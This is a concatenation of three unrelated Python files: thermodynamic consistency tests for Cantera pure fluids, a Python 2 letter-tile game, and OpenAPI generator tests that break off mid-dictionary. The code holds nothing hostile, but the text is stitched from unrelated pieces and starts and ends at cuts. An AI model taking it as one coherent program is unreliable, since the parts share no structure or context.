    # NOTE(review): the default Tolerances() instance is shared between
    # calls (mutable default argument) -- harmless as long as callers do
    # not mutate it; confirm.
    def __init__(self, name, refState, tolerances=Tolerances()):
        if name not in self.fluids:
            self.fluids[name] = ct.PureFluid('liquidvapor.xml', name)
        self.fluid = self.fluids[name]
        # Record u and s at the reference state so tabulated values can
        # be compared as datum-independent offsets.
        self.fluid.TD = refState.T, refState.rho
        self.refState = refState
        self.u0 = self.fluid.u
        self.s0 = self.fluid.s
        self.tol = tolerances

    def a(self, T, rho):
        """ Helmholtz free energy """
        self.fluid.TD = T, rho
        return self.fluid.u - T * self.fluid.s

    def test_consistency_temperature(self):
        # Central finite difference in T at constant density.
        for state in self.states:
            dT = 2e-5 * state.T
            self.fluid.TD = state.T-dT, state.rho
            s1 = self.fluid.s
            u1 = self.fluid.u
            self.fluid.TD = state.T+dT, state.rho
            s2 = self.fluid.s
            u2 = self.fluid.u
            # At constant volume, dU = T dS
            msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
            self.assertNear((u2-u1)/(s2-s1), state.T, self.tol.dUdS, msg=msg)

    def test_consistency_volume(self):
        # Central finite difference in V at constant temperature.
        for state in self.states:
            self.fluid.TD = state.T, state.rho
            p = self.fluid.P
            V = 1 / state.rho
            dV = 5e-6 * V
            a1 = self.a(state.T, 1/(V-0.5*dV))
            a2 = self.a(state.T, 1/(V+0.5*dV))
            # dP/drho is high for liquids, so relax tolerances
            tol = 100*self.tol.dAdV if state.phase == 'liquid' else self.tol.dAdV
            # At constant temperature, dA = - p dV
            msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
            self.assertNear(-(a2-a1)/dV, p, tol, msg=msg)

    def test_saturation(self):
        for state in self.states:
            if state.phase == 'super':
                # No saturation curve above the critical point.
                continue
            dT = 1e-6 * state.T
            self.fluid.TX = state.T, 0
            p1 = self.fluid.P
            vf = 1.0 / self.fluid.density
            hf = self.fluid.h
            sf = self.fluid.s
            self.fluid.TX = state.T + dT, 0
            p2 = self.fluid.P
            self.fluid.TX = state.T, 1
            vg = 1.0 / self.fluid.density
            hg = self.fluid.h
            sg = self.fluid.s
            # Clausius-Clapeyron Relation
            msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
            self.assertNear((p2-p1)/dT, (hg-hf)/(state.T * (vg-vf)),
                            self.tol.dPdT, msg=msg)
            # True for a change in state at constant pressure and temperature
            self.assertNear(hg-hf, state.T * (sg-sf), self.tol.hTs, msg=msg)

    def test_pressure(self):
        for state in self.states:
            self.fluid.TD = state.T, state.rho
            # dP/drho is high for liquids, so relax tolerances
            tol = 50*self.tol.p if state.phase == 'liquid' else self.tol.p
            tol *= state.tolMod
            msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
            self.assertNear(self.fluid.P, state.p, tol, msg=msg)

    def test_internal_energy(self):
        # Compare u as an offset from the reference state.
        for state in self.states:
            self.fluid.TD = state.T, state.rho
            msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
            self.assertNear(self.fluid.u - self.u0,
                            state.u - self.refState.u,
                            self.tol.u * state.tolMod, msg=msg)

    def test_entropy(self):
        # Compare s as an offset from the reference state.
        for state in self.states:
            self.fluid.TD = state.T, state.rho
            msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
            self.assertNear(self.fluid.s - self.s0,
                            state.s - self.refState.s,
                            self.tol.s * state.tolMod, msg=msg)
# Reference values for HFC134a taken from NIST Chemistry WebBook, which
# implements the same EOS from Tillner-Roth and Baehr as Cantera, so close
# agreement is expected.
class HFC134a(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for refrigerant HFC-134a."""
    # Columns: phase, T [K], p [MPa], then rho/v, u/h, s in table units.
    states = [
        StateData('liquid', 175.0, 0.1, rho=1577.6239, u=77.534586, s=0.44788182),
        StateData('liquid', 210.0, 0.1, rho=1483.2128, u=119.48566, s=0.66633877),
        StateData('vapor', 250.0, 0.1, rho=5.1144317, u=365.59424, s=1.7577491),
        StateData('vapor', 370.0, 0.1, rho=3.3472612, u=459.82664, s=2.0970769),
        StateData('liquid', 290.0, 10, rho=1278.4700, u=216.99119, s=1.0613409),
        StateData('super', 410.0, 10, rho=736.54666, u=399.02258, s=1.5972395),
        StateData('super', 450.0, 40, rho=999.34087, u=411.92422, s=1.6108568)]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 374.21, 4.05928,
                             rho=511.900, u=381.70937, s=1.5620991)
        PureFluidTestCases.__init__(self, 'hfc134a', refState)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
# Reference values for the following substances are taken from the tables in
# W.C. Reynolds, "Thermodynamic Properties in SI", which is the source of
# Cantera's equations of state for these substances. Agreement is limited by
# the precision of the results printed in the book (typically 4 significant
# figures).
# Property comparisons for saturated states are further limited by the use of
# different methods for satisfying the phase equilibrium condition g_l = g_v.
# Cantera uses the actual equation of state, while the tabulated values given
# by Reynolds are based on the given P_sat(T_sat) relations.
class CarbonDioxide(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for CO2 (Reynolds tables)."""
    states = [
        StateData('liquid', 230.0, 2.0, rho=1132.4, h=28.25, s=0.1208),
        StateData('liquid', 270.0, 10.0, rho=989.97, h=110.59, s=0.4208),
        StateData('vapor', 250.0, 1.788, v=0.02140, h=358.59, s=1.4500, relax=True), # sat
        StateData('vapor', 300.0, 2.0, v=0.02535, h=409.41, s=1.6174),
        StateData('super', 500.0, 1.0, v=0.09376, h=613.22, s=2.2649),
        StateData('super', 600.0, 20.0, v=0.00554, h=681.94, s=1.8366)]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 304.21, 7.3834,
                             rho=464.0, h=257.31, s=0.9312)
        tols = Tolerances(2e-3, 2e-3, 2e-3)
        PureFluidTestCases.__init__(self, 'carbondioxide', refState, tols)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
class Heptane(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for n-heptane (Reynolds tables)."""
    states = [
        StateData('liquid', 300.0, 0.006637, v=0.001476, h=0.0, s=0.0, relax=True), # sat
        StateData('liquid', 400.0, 0.2175, v=0.001712, h=248.01, s=0.709, relax=True), # sat
        StateData('vapor', 490.0, 1.282, v=0.02222, h=715.64, s=1.7137, relax=True), # sat
        StateData('vapor', 480.0, 0.70, v=0.04820, h=713.04, s=1.7477),
        StateData('super', 600.0, 2.0, v=0.01992, h=1014.87, s=2.2356),
        StateData('super', 680.0, 0.2, v=0.2790, h=1289.29, s=2.8450)]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 537.68, 2.6199,
                             rho=197.60, h=747.84, s=1.7456)
        tols = Tolerances(2e-3, 2e-3, 2e-3)
        PureFluidTestCases.__init__(self, 'heptane', refState, tols)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
# para-hydrogen
class Hydrogen(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for para-hydrogen (Reynolds tables)."""
    states = [
        StateData('liquid', 18.0, 0.04807, v=0.013660, h=30.1, s=1.856, relax=True), # sat
        StateData('liquid', 26.0, 0.4029, v=0.015911, h=121.2, s=5.740, relax=True), # sat
        StateData('vapor', 30.0, 0.8214, v=0.09207, h=487.4, s=17.859, relax=True), # sat
        StateData('super', 100.0, 0.20, v=2.061, h=1398.3, s=39.869),
        StateData('super', 200.0, 20.0, v=0.04795, h=3015.9, s=31.274),
        StateData('super', 300.0, 0.50, v=2.482, h=4511.6, s=53.143),
        StateData('super', 600.0, 1.00, v=2.483, h=8888.4, s=60.398),
        StateData('super', 800.0, 4.0, v=0.8329, h=11840.0, s=58.890)]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 32.938, 1.2838,
                             rho=31.36, h=346.5, s=12.536)
        tols = Tolerances(2e-3, 2e-3, 2e-3, 2e-4)
        PureFluidTestCases.__init__(self, 'hydrogen', refState, tols)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
class Methane(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for methane (Reynolds tables)."""
    states = [
        StateData('liquid', 100.0, 0.50, rho=439.39, h=31.65, s=0.3206),
        StateData('liquid', 140.0, 2.0, rho=379.51, h=175.48, s=1.4963),
        StateData('vapor', 150.0, 0.20, v=0.3772, h=660.72, s=5.5435),
        StateData('vapor', 160.0, 1.594, v=0.03932, h=627.96, s=4.3648, relax=True), # sat
        StateData('vapor', 175.0, 1.0, v=0.08157, h=692.55, s=4.9558),
        StateData('super', 200.0, 0.2, v=0.5117, h=767.37, s=6.1574),
        StateData('super', 300.0, 0.5, v=0.3083, h=980.87, s=6.5513)]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 190.555, 4.5988,
                             rho=160.43, h=490.61, s=3.2853)
        tols = Tolerances(2e-3, 2e-3, 2e-3)
        PureFluidTestCases.__init__(self, 'methane', refState, tols)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
class Nitrogen(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for nitrogen (Reynolds tables)."""
    states = [
        StateData('liquid', 80.0, 0.1370, v=0.001256, h=33.50, s=0.4668, relax=True), # sat
        StateData('vapor', 110.0, 1.467, v=0.01602, h=236.28, s=2.3896, relax=True), # sat
        StateData('super', 200.0, 0.5, v=0.1174, h=355.05, s=3.5019),
        StateData('super', 300.0, 10.0, v=0.00895, h=441.78, s=2.9797),
        StateData('super', 500.0, 5.0, v=0.03031, h=668.48, s=3.7722),
        StateData('super', 600.0, 100.0, v=0.00276, h=827.54, s=3.0208)]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 126.200, 3.400,
                             rho=314.03, h=180.78, s=1.7903)
        tols = Tolerances(2e-3, 2e-3, 2e-3)
        PureFluidTestCases.__init__(self, 'nitrogen', refState, tols)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
class Oxygen(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for oxygen (Reynolds tables)."""
    states = [
        StateData('liquid', 80.0, 0.03009, v=0.000840, h=42.56, s=0.6405, relax=True), # sat
        StateData('liquid', 125.0, 1.351, v=0.001064, h=123.24, s=1.4236, relax=True), # sat
        StateData('vapor', 145.0, 3.448, v=0.006458, h=276.45, s=2.4852, relax=True), # sat
        StateData('super', 200.0, 0.050, v=1.038, h=374.65, s=4.1275),
        StateData('super', 300.0, 1.0, v=0.07749, h=463.76, s=3.7135),
        StateData('super', 600.0, 0.20, v=0.7798, h=753.38, s=4.7982),
        StateData('super', 800.0, 5.0, v=0.04204, h=961.00, s=4.2571)
    ]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 154.581, 5.0429,
                             rho=436.15, h=226.53, s=2.1080)
        tols = Tolerances(2e-3, 2e-3, 2e-3)
        PureFluidTestCases.__init__(self, 'oxygen', refState, tols)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
class Water(PureFluidTestCases, utilities.CanteraTest):
    """Tabulated reference states for water (Reynolds tables)."""
    states = [
        StateData('liquid', 295.0, 0.002620, v=0.0010025, h=90.7, s=0.3193, relax=True),
        StateData('vapor', 315.0, 0.008143, v=17.80, h=2577.1, s=8.2216, relax=True),
        StateData('liquid', 440.0, 0.7332, v=0.001110, h=705.0, s=2.0096, relax=True),
        StateData('vapor', 510.0, 3.163, v=0.06323, h=2803.6, s=6.1652, relax=True),
        StateData('vapor', 400.0, 0.004, v=46.13, h=2738.8, s=9.0035),
        StateData('vapor', 500.0, 1.0, v=0.2206, h=2890.2, s=6.8223),
        StateData('super', 800.0, 0.01, v=36.92, h=3546.0, s=9.9699),
        StateData('super', 900.0, 0.70, v=0.5917, h=3759.4, s=8.2621),
        StateData('super', 1000.0, 30.0, v=0.01421, h=3821.6, s=6.6373),
        StateData('liquid', 500.0, 3.0, rho=832.04, h=975.68, s=2.58049)
    ]

    def __init__(self, *args, **kwargs):
        # Reference datum: the critical point.
        refState = StateData('critical', 647.286, 22.089,
                             rho=317.0, h=2098.8, s=4.4289)
        tols = Tolerances(2e-3, 2e-3, 2e-3)
        PureFluidTestCases.__init__(self, 'water', refState, tols)
        utilities.CanteraTest.__init__(self, *args, **kwargs)
class PureFluidConvergence(utilities.CanteraTest):
    """Stress the property-pair solvers for water over wide ranges,
    collecting all failures so one failing point does not hide others."""
    def setUp(self):
        self.fluid = ct.Water()

    def test_TP(self):
        # Focus on the region near the critical point
        TT = [273.161, 300.0, 350.0, 400.0, 500.0,
              600.0, 640.0, 645.0, 646.0, 647.0,
              647.1, 647.2, 647.22, 647.23, 647.25,
              647.26, 647.27, 647.28, 647.282, 647.284,
              647.285, 647.286, 647.287, 650.0, 800.0]
        PP = [1234.0, 101325.0, 5e5, 22.0e6, 22.08e6, 22.09e6, 10001000.0]
        errors = ''
        nErrors = 0
        # Try every (T, P) combination; accumulate failures and report
        # them all at the end.
        for T,P in itertools.product(TT, PP):
            try:
                self.fluid.TP = T, P
                self.assertNear(self.fluid.T, T, 1e-6)
                self.assertNear(self.fluid.P, P, 1e-6)
            except Exception as e:
                errors += 'Error at T=%r, P=%r:\n%s\n\n' % (T,P,e)
                nErrors += 1
        if errors:
            errors += 'Total error count:%s\n' % nErrors
            raise AssertionError(errors)

    def test_UV(self):
        # Offsets relative to a liquid-water internal energy datum.
        u0 = -1.58581e7
        UU = np.array([0, 100, 200, 500, 1000, 1500, 2000]) * 1000 + u0
        VV = [0.001, 0.002, 0.005, 0.010, 0.10, 0.5, 1.0, 1.5, 2.0]
        errors = ''
        nErrors = 0
        for u,v in itertools.product(UU, VV):
            try:
                self.fluid.UV = u, v
                self.assertNear(self.fluid.u, u, 1e-6)
                self.assertNear(self.fluid.v, v, 1e-6)
            except Exception as e:
                errors += 'Error at u=%r, v=%r:\n%s\n\n' % (u,v,e)
                nErrors += 1
        if errors:
            errors += 'Total error count:%s\n' % nErrors
            raise AssertionError(errors)

    def test_HP(self):
        # Offsets relative to a liquid-water enthalpy datum.
        h0 = -1.58581e7
        HH = np.array([0, 100, 200, 500, 1000, 1500, 2000]) * 1000 + h0
        PP = [1234.0, 101325.0, 5e5, 22.0e6, 22.08e6, 22.09e6, 10001000.0]
        errors = ''
        nErrors = 0
        for h,P in itertools.product(HH, PP):
            try:
                self.fluid.HP = h, P
                self.assertNear(self.fluid.h, h, 1e-6)
                self.assertNear(self.fluid.P, P, 1e-6)
            except Exception as e:
                errors += 'Error at h=%r, P=%r:\n%s\n\n' % (h,P,e)
                nErrors += 1
        if errors:
            errors += 'Total error count:%s\n' % nErrors
            raise AssertionError(errors)
| |
import os
import random
import letters
class Field(object):
    '''
    The Field is the data structure that will hold all tiles
    currently on-screen, as well as the tile currently falling.
    It is a list of lists, where for any <self.cells[i][j]>, i represents
    the row and j represents the column.
    '''
    def __init__(self, language, num_rows, num_columns):
        self.language = language
        # None entries padded into the pool become wildcard tiles when
        # drawn (see create_random_tile).
        self.letters = letters.Alphabet(language).weighted + ([None] * 5000)
        self.num_rows = num_rows
        # NOTE(review): "/" is integer division here (this module uses
        # the Python 2 print statement) -- confirm the intended halving.
        self.floor_one = (num_rows / 2) - 1
        self.floor_two = num_rows - 1
        self.num_columns = num_columns
        self.cells = []
        self.active_tile = None
        self.tile_queue = []
        self.queue_limit = 5
        # Build an empty num_rows x num_columns grid of None cells.
        for i in range(num_rows):
            self.cells.append([])
            for j in range(num_columns):
                self.cells[i].append(None)
        self.load_queue()
        self.get_tile_from_queue()

    def __str__(self):
        output = '\n'.join([str([cell for cell in row]) for row in self.cells])
        return "Field state:\n" + output

    def __repr__(self):
        tokens = (self.language, self.num_rows, self.num_columns)
        output = "Field, language: %s, dimensions: (%d,%d)" % tokens
        return output

    def active_tile_has_landed(self):
        # The falling tile lands when the row beneath it is the upper
        # floor (floor_one) or is already occupied.
        tile = self.active_tile
        row, column = tile.location
        row_beneath = row + 1
        return (row_beneath >= self.floor_one) or \
            self.cells[row_beneath][column] != None

    def add_tile_to_queue(self, tile):
        self.tile_queue.append(tile)

    def change_wildcard_letter(self, forward):
        # Cycle the active wildcard tile through the language's letter
        # list, wrapping around at either end.
        if self.active_tile.wildcard:
            letter = self.active_tile.letter
            letter_list = letters.languages[self.language]
            letter_count = len(letter_list)
            if letter:
                index = letter_list.index(letter)
                if forward:
                    new_index = (index + 1) % letter_count
                else:
                    new_index = (index - 1) % letter_count
            else:
                # Letter not chosen yet: start from either end.
                new_index = 0 if forward else letter_count - 1
            self.active_tile.letter = letter_list[new_index]

    def create_random_tile(self):
        letter = random.choice(self.letters)
        tile = Tile(self, letter)
        # Drawing a None from the pool produces a blank wildcard tile.
        if not tile.letter:
            tile.wildcard = True
        return tile

    def deactivate_active_tile(self):
        self.active_tile = None

    def drop_active_tile(self):
        # Hard drop: move straight down until the tile lands.
        while not self.active_tile_has_landed():
            self.move_tile(self.active_tile, [1,0])

    def drop_column(self, column_number):
        if self.cells[self.floor_two][column_number]: # column is full
            return None
        else:
            # Collect the active tile plus the contiguous stack below it.
            column_tiles = [self.active_tile]
            current_row = self.active_tile.location[0] + 1
            for i in range(current_row, self.num_rows):
                if self.cells[i][column_number]:
                    column_tiles.append(self.cells[i][column_number])
                    current_row += 1
            if len(column_tiles) == 1:
                return None
            for tile in reversed(column_tiles): # move from bottom to top
                self.move_tile(tile, [1,0])

    def get_tile_from_queue(self):
        # Pop the next queued tile into play and backfill the queue.
        if self.tile_queue:
            self.active_tile = self.tile_queue.pop(0)
            self.add_tile_to_queue(self.create_random_tile())
        else:
            print "Queue is empty!"

    def load_queue(self):
        while len(self.tile_queue) < self.queue_limit:
            tile = self.create_random_tile()
            self.add_tile_to_queue(tile)

    def move_tile(self, tile, direction):
        # direction is a [row_delta, column_delta] pair.
        # NOTE(review): new_row is not bounds-checked; callers appear to
        # rely on active_tile_has_landed() to keep moves inside the grid
        # -- confirm.
        row, column = tile.location
        new_row, new_column = (row + direction[0], column + direction[1])
        if new_column not in range(0, self.num_columns) or\
                self.cells[new_row][new_column]:
            return False
        self.cells[row][column] = None
        self.place_tile(tile, (new_row, new_column))

    def place_tile(self, tile, location):
        row, column = location
        if self.cells[row][column]:
            return False
        else:
            self.cells[row][column] = tile
            tile.location = location
            return True

    def stage_tile(self):
        '''
        Stage a wildcard tile as the next tile in the queue.
        '''
        self.tile_queue[0] = Tile(self, 'wildcard')
class Tile(object):
    '''
    A simple, one-square tile representing one of the 26 letters of the
    English alphabet, or a blank wild-card square.
    Although for right now I am working with English to get a prototype
    going, I plan on loading the alphabet into the game in a way that will
    allow for extensibility.
    '''
    def __init__(self, field, letter='wildcard'):
        self.location = None
        self.field = field
        if letter == 'wildcard':
            # Blank tile: the player chooses its letter later.
            self.letter = None
            self.wildcard = True
        else:
            self.letter = letter
            self.wildcard = False

    def __repr__(self):
        return "%s" % self.letter

    __str__ = __repr__

    def push_tile_below(self, field):
        """Push this tile one row down, recursively pushing any tile
        beneath it first.

        Returns True when the tile moved, False when blocked by the
        bottom of the field (directly or transitively).
        """
        row, column = self.location
        if (row + 1) >= self.field.num_rows:
            return False
        # BUG FIX: Field is not subscriptable -- the grid lives in
        # Field.cells, so index that instead of the Field object itself
        # (the old code raised TypeError on every call).
        below = self.field.cells[row + 1][column]
        if below:
            # Occupied: try to push the lower tile down first.
            if below.push_tile_below(field):
                self.location = (row + 1, column)
                self.field.cells[row + 1][column] = self
                self.field.cells[row][column] = None
                return True
            return False
        # The cell below is free; just move down.
        self.location = (row + 1, column)
        self.field.cells[row + 1][column] = self
        self.field.cells[row][column] = None
        return True
class LetterPool(object):
    """
    This object will keep a list of letters, weighted by probability in order
    to maintain a more helpful distribution of letters throughout the game.
    Letter frequencies by word were found at:
    http://en.wikipedia.org/wiki/Letter_frequency#Relative_frequencies_of_letters_in_the_English_language
    """
    FILE_DIRECTORY = os.getcwd() + os.sep + "letterfiles" + os.sep
    # Known languages are derived from the letter files on disk
    # (everything before the first dot of each filename).
    LANGUAGES = []
    for file_name in os.listdir(FILE_DIRECTORY):
        dot = file_name.index('.')
        LANGUAGES.append(file_name[:dot])

    def __init__(self, language):
        self.language = language

    def parseLetterFile(self):
        """Read this language's letter-frequency CSV.

        Returns the raw lines; turning them into weights is still TODO.
        """
        # BUG FIX: FILE_DIRECTORY is a class attribute and was referenced
        # as a bare name here, raising NameError at call time. The file
        # handle was also leaked; the context manager closes it.
        with open(self.FILE_DIRECTORY + self.language + ".csv") as letter_file:
            return letter_file.readlines()
class Wordlist(object):
    """
    The list of words that the game will check against to search for a match.
    Will be extensible for multiple languages.
    """
    def __init__(self, language):
        # Only the built-in debug vocabulary exists so far; anything else
        # is not implemented yet.
        if language != "debug":
            raise NotImplementedError
        self.words = set(["a", "test", "module", "for", "words"])
| |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for endpoints.openapi_generator."""
import json
import unittest
import endpoints.api_config as api_config
from protorpc import message_types
from protorpc import messages
from protorpc import remote
import endpoints.resource_container as resource_container
import endpoints.openapi_generator as openapi_generator
import test_util
package = 'OpenApiGeneratorTest'
class Nested(messages.Message):
    """Message class to be used in a message field."""
    # Two optional scalar fields, numbered 1 and 2.
    int_value = messages.IntegerField(1)
    string_value = messages.StringField(2)
class SimpleEnum(messages.Enum):
    """Simple enumeration type."""
    # Two arbitrary values, used to exercise enum handling.
    VAL1 = 1
    VAL2 = 2
class AllFields(messages.Message):
    """Contains all field types."""
    # One field per protorpc variant, so the generator's type/format
    # mapping can be checked exhaustively.
    bool_value = messages.BooleanField(1, variant=messages.Variant.BOOL)
    bytes_value = messages.BytesField(2, variant=messages.Variant.BYTES)
    double_value = messages.FloatField(3, variant=messages.Variant.DOUBLE)
    enum_value = messages.EnumField(SimpleEnum, 4)
    float_value = messages.FloatField(5, variant=messages.Variant.FLOAT)
    int32_value = messages.IntegerField(6, variant=messages.Variant.INT32)
    int64_value = messages.IntegerField(7, variant=messages.Variant.INT64)
    string_value = messages.StringField(8, variant=messages.Variant.STRING)
    uint32_value = messages.IntegerField(9, variant=messages.Variant.UINT32)
    uint64_value = messages.IntegerField(10, variant=messages.Variant.UINT64)
    sint32_value = messages.IntegerField(11, variant=messages.Variant.SINT32)
    sint64_value = messages.IntegerField(12, variant=messages.Variant.SINT64)
    # Non-scalar fields: nested message and datetime.
    message_field_value = messages.MessageField(Nested, 13)
    datetime_value = message_types.DateTimeField(14)
# This is used to test "all fields" as query parameters instead of the body
# in a request.
ALL_FIELDS_AS_PARAMETERS = resource_container.ResourceContainer(
    **{field.name: field for field in AllFields.all_fields()})
class BaseOpenApiGeneratorTest(unittest.TestCase):
    """Common fixture shared by the OpenAPI generator test cases."""

    @classmethod
    def setUpClass(cls):
        # The expected/actual OpenAPI dicts are large; show full diffs.
        cls.maxDiff = None

    def setUp(self):
        self.generator = openapi_generator.OpenApiGenerator()

    def _def_path(self, path):
        """Return the '#/definitions/...' reference string for *path*."""
        return '#/definitions/' + path
class OpenApiGeneratorTest(BaseOpenApiGeneratorTest):
def testAllFieldTypes(self):
class PutRequest(messages.Message):
"""Message with just a body field."""
body = messages.MessageField(AllFields, 1)
# pylint: disable=invalid-name
class ItemsPutRequest(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
entryId = messages.StringField(2, required=True)
class ItemsPutRequestForContainer(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
items_put_request_container = resource_container.ResourceContainer(
ItemsPutRequestForContainer,
entryId=messages.StringField(2, required=True))
# pylint: disable=invalid-name
class EntryPublishRequest(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entryId = messages.StringField(2, required=True)
class EntryPublishRequestForContainer(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entry_publish_request_container = resource_container.ResourceContainer(
EntryPublishRequestForContainer,
entryId=messages.StringField(2, required=True))
class BooleanMessageResponse(messages.Message):
result = messages.BooleanField(1, required=True)
@api_config.api(name='root', hostname='example.appspot.com', version='v1')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(AllFields, message_types.VoidMessage, path='entries',
http_method='GET', name='entries.get')
def entries_get(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(ALL_FIELDS_AS_PARAMETERS, message_types.VoidMessage,
path='entries/container', http_method='GET',
name='entries.getContainer')
def entries_get_container(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(PutRequest, BooleanMessageResponse, path='entries',
name='entries.put')
def entries_put(self, unused_request):
"""Request body is in the body field."""
return BooleanMessageResponse(result=True)
@api_config.method(AllFields, message_types.VoidMessage, path='process',
name='entries.process')
def entries_process(self, unused_request):
"""Message is the request body."""
return message_types.VoidMessage()
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
name='entries.nested.collection.action',
path='nested')
def entries_nested_collection_action(self, unused_request):
"""A VoidMessage for a request body."""
return message_types.VoidMessage()
@api_config.method(AllFields, AllFields, name='entries.roundtrip',
path='roundtrip')
def entries_roundtrip(self, unused_request):
"""All field types in the request and response."""
pass
# Test a method with a required parameter in the request body.
@api_config.method(EntryPublishRequest, message_types.VoidMessage,
path='entries/{entryId}/publish',
name='entries.publish')
def entries_publish(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
@api_config.method(entry_publish_request_container,
message_types.VoidMessage,
path='entries/container/{entryId}/publish',
name='entries.publishContainer')
def entries_publish_container(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
# Test a method with a parameter in the path and a request body.
@api_config.method(ItemsPutRequest, message_types.VoidMessage,
path='entries/{entryId}/items',
name='entries.items.put')
def items_put(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
@api_config.method(items_put_request_container, message_types.VoidMessage,
path='entries/container/{entryId}/items',
name='entries.items.putContainer')
def items_put_container(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
# Some constants to shorten line length in expected OpenAPI output
prefix = 'OpenApiGeneratorTest'
boolean_response = prefix + 'BooleanMessageResponse'
all_fields = prefix + 'AllFields'
nested = prefix + 'Nested'
entry_publish_request = prefix + 'EntryPublishRequest'
publish_request_for_container = prefix + 'EntryPublishRequestForContainer'
items_put_request = prefix + 'ItemsPutRequest'
put_request_for_container = prefix + 'ItemsPutRequestForContainer'
put_request = prefix + 'PutRequest'
expected_openapi = {
'swagger': '2.0',
'info': {
'title': 'root',
'description': 'Describes MyService.',
'version': 'v1',
},
'host': 'example.appspot.com',
'consumes': ['application/json'],
'produces': ['application/json'],
'schemes': ['https'],
'basePath': '/_ah/api',
'paths': {
'/root/v1/entries': {
'get': {
'operationId': 'MyService_entriesGet',
'parameters': [
{
'name': 'bool_value',
'in': 'query',
'type': 'boolean',
},
{
'name': 'bytes_value',
'in': 'query',
'type': 'string',
'format': 'byte',
},
{
'name': 'double_value',
'in': 'query',
'type': 'number',
'format': 'double',
},
{
'name': 'enum_value',
'in': 'query',
'type': 'string',
'enum': [
'VAL1',
'VAL2',
],
},
{
'name': 'float_value',
'in': 'query',
'type': 'number',
'format': 'float',
},
{
'name': 'int32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'int64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
},
{
'name': 'string_value',
'in': 'query',
'type': 'string',
},
{
'name': 'uint32_value',
'in': 'query',
'type': 'integer',
'format': 'uint32',
},
{
'name': 'uint64_value',
'in': 'query',
'type': 'string',
'format': 'uint64',
},
{
'name': 'sint32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'sint64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
}
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
'post': {
'operationId': 'MyService_entriesPut',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
'schema': {
'$ref': self._def_path(boolean_response),
},
},
},
},
},
'/root/v1/entries/container': {
'get': {
'operationId': 'MyService_entriesGetContainer',
'parameters': [
{
'name': 'bool_value',
'in': 'query',
'type': 'boolean',
},
{
'name': 'bytes_value',
'in': 'query',
'type': 'string',
'format': 'byte',
},
{
'name': 'double_value',
'in': 'query',
'type': 'number',
'format': 'double',
},
{
'name': 'enum_value',
'in': 'query',
'type': 'string',
'enum': [
'VAL1',
'VAL2',
],
},
{
'name': 'float_value',
'in': 'query',
'type': 'number',
'format': 'float',
},
{
'name': 'int32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'int64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
},
{
'name': 'string_value',
'in': 'query',
'type': 'string',
},
{
'name': 'uint32_value',
'in': 'query',
'type': 'integer',
'format': 'uint32',
},
{
'name': 'uint64_value',
'in': 'query',
'type': 'string',
'format': 'uint64',
},
{
'name': 'sint32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'sint64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/container/{entryId}/items': {
'post': {
'operationId': 'MyService_itemsPutContainer',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
